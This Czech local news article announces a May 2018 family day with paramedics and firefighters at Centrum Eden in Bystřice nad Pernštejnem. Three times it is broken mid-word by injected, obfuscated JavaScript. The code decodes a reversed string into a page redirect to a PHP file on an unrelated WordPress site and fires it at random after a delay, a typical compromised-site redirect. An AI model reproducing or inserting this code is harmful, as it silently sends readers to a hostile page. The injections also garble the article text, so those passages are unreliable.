Rainbow page separator

Den hrdinů všedních dnů v Edenu

Úterý, 15. května 2018

 

Bystřice nad Pernštejnem / Dne 26. května se uskuteční v zábavním a poznávacím centru v Bystřici nad Pernštejnem akce s názvem Den hrdinů všedních dnů aneb den plný zábavy a poznání nejen pro děti. Po celý sobotní den budou k vidění zdravotníci a hasiči, kteří seznámí návštěvníky s náplní své každodenní práce.

"Chceme se v ten["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to den zaměřit na zdraví a bezpečnost. Zábavnou formou seznámíme malé i velké se základy první pomoci a péčí o své zdraví," uvádí Jana Trávníčková z Centra Eden.

Po areálu budou rozmístěna stanoviště, kde si návštěvníci mohou nechat změřit tlak, dozví se jak ošetřit ránu, provést kardiopulmonální resuscitaci, jak ošetřit zraněného nebo jak se zachovat v krizové situaci. Hasiči předvedou ukázku zásahu - vystříhávání figuranta z auta a hašení vzníceného oleje.

Po celý den bude pro děti připraveno množství zábavních atrakcí - skákací hrad ve tvaru hasičského auta, soutěž o ceny, malování na obličej, bazének s balónky, fo["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tokoutek, ukázka exotických hadů, kolo["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toč, ad.

Občerstvení bude zajištěno na několika místech včetně dětského menu. Více informací k nadcházející akci naleznete na www.centrumeden.cz nebo na www.facebook.com/centrumeden

Den hrdinů všedních dnů

Kdy: 26. května 2018 od 9.30 do 18.00 Kde: Areál Centra Eden v Bystřici nad Pernštejnem Vstupné: dospělí 120 Kč, děti do 6 let zdarma, od 6 do 15 let 80 Kč